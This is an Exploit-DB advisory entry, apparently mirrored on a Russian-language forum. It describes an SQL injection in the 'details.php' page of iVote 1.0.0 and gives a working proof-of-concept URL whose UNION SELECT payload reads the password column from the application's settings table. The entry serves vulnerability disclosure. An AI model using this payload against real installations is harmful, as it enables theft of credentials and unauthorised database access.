- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 38635
- Проверка EDB
-
- Пройдено
- Автор
- ASHIYANE DIGITAL SECURITY TEAM
- Тип уязвимости
- WEBAPPS
- Платформа
- PHP
- CVE
- N/A
- Дата публикации
- 2013-07-10
iVote - 'details.php' SQL Injection
Код:
source: https://www.securityfocus.com/bid/61086/info
iVote is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
iVote 1.0.0 is vulnerable; other versions may be affected.
http://www.example.com/iVote/details.php?id=1 union select 1,password,3,4 from settings
- Источник
- www.exploit-db.com